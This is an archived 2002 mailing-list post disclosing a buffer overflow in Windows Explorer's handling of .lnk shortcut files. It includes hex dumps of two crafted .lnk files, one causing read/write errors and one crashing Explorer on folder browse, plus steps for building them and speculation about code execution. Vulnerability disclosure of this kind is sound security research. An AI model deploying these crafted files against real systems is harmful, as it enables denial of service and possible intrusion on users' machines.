It seems that the handling of .lnk files has a few problems. I have tested on both win98 and win2000 sp2 server. Can anyone test further. Note that the actions taken by these .lnk files has the possiblity of causing damage to a system and should not be tested on an essential server :-) ------------------------------------------------------------------- 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20 2 +,RG New 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78 Text Document.tx 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF t NEWTEX~3.TXT FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00 ------------------------------------------------------------------- This causes FF FF to be loaded into a register used to control the length of data copied. Usually causes an error when right clicking on the file in explorer. Sometimes it is required to select properties. Errors seen include unable to read, unable to write. Since we are controlling the length of the data copies these errors are self explanatory. Would seeme that explorer/shell32.dll is copying to much data when reading the filename?. Ok so this causes the read/write errors and halts progress. But if we substitute valid values such as 01 01 (CC CC) then the buffer still gets overflowed but we bypass this error and our corrupt values get further down in the program. ------------------------------------------------------------------- 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20 2 +,RG New 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78 Text Document.tx 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC t NEWTEX~3.TXT¦¦ CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0 ¦¦¤¤¤¤¤¤________ AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ ------------------------------------------------------------------- This one does not cause the read/write errors but causes a DoS in explorer just by browsing to the folder holding the file. This is more interesting, but involves tracking a lot of assembler code. Worst result would be some sort of code executed just by browsing a folder. Virus related perhaps. Any feedback on results or further research into this problem would be appreciated. Notes: Do not save to your desktop. Rename the file to .lnk This is the win98 file. You can easily modify a 2000 or other lnk file as detailed above. Brett Moore
This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 09:52:52 PDT